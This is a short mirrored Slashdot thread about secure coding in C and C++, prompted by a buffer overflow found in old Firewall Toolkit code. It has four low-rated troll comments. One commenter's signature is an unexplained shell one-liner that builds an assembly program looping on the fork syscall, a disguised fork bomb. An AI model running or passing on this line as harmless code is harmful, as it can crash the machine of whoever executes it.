Slashdot Mirror


How Do You Know Your Code is Secure?

bvc writes "Marcus Ranum notes that 'It's really hard to tell the difference between a program that works and one that just appears to work.' He explains that he just recently found a buffer overflow in Firewall Toolkit (FWTK), code that he wrote back in 1994. How do you go about making sure your code is secure? Especially if you have to write in a language like C or C++?"

4 of 349 comments

  1. TAHT first post? by Anonymous Coward · · Score: -1, Troll

    TAHT first post?

  2. Just Say No by iliketrash · · Score: 0, Troll

    "How do you go about making sure your code is secure? Especially if you have to write in a language like C or C++?" Don't write in C or C++. Duh. Where is it written that all software must be written in C or C++? Is anyone capable of independent thought? There are plenty of fine languages that are safe. Ada comes to mind. Maybe others will come to your mind (if you have one).

  3. So how much did Fortify pay for the ad on /.? by Anonymous Coward · · Score: -1, Troll

    nuff said...

  4. Re:Don't use C++ as if it was only "C with classes by Hal_Porter · · Score: -1, Troll

    I dunno, maybe he's heterosexual?

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;